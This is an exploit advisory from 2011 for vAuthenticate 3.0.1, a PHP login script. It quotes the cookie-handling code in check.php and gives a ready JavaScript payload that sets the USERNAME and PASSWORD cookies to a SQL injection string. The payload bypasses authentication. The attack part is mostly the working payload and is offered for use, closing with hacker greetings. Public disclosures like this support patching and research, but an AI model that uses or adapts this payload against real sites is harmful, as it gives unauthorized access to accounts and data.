vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vuln

1. -----------------------------------------------------------------------
2.  
3. vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability
4.  
5. -----------------------------------------------------------------------
6.  
7. Author: bd0rk
8.  
9. Contact: h4(k3r
10.  
11. Date: 2011 / 09 / 15
12.  
13. MEZ-Time: 01:35
14.  
15. Tested on WinVista & Ubuntu-Linux
16.  
17. Affected-Software: vAuthenticate 3.0.1
18.  
19. Vendor: http://www.beanbug.net/vScripts.php
20.  
21. Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip
22.  
23. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
24.  
25. Found vulnerable code in check.php:
26.  
27. if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD']))
28. {
29. // Get values from superglobal variables
30. $USERNAME = $_COOKIE['USERNAME'];
31. $PASSWORD = $_COOKIE['PASSWORD'];
32.  
33. $CheckSecurity = new auth();
34. $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
35. }
36. else
37. {
38. $check = false;
39. }
40.  
41. if ($check == false)
42. {
43.  
44. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
45.  
46.  
47. Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]";
48.  
49. javascript:document.cookie = "[PASSWORD]=' or '; [PATH]";
50.  
51.  
52. Them use login.php 4AuthBypass :P
53.  
54. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
55.  
56.  
57.  
58. ---Greetings from hot Germany, the 22 years old bd0rk. :-)
59.  
60. Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead
61.  
62.